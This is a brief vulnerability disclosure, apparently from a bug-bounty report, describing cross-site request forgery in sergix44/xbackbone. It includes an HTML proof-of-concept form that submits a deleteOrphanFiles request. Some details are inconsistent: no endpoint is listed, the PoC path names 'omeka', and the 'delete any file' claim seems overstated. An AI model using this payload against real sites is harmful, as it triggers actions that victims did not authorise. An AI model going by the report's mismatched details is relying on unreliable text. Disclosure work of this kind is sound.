Cross-Site Request Forgery (CSRF) in sergix44/xbackbone
Jul 30th 2021
following endpoint vulnerable to CSRF:
Also there is not any different that you run The application in localhost or some real hosts, this is enough to login with a browser that used the browser for online web surfacing too.
🕵️♂️ Proof of Concept
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost:8000/omeka/system/deleteOrphanFiles"> <input type="submit" value="Submit request" /> </form> </body> </html>
This vulnerability is capable of delete any file.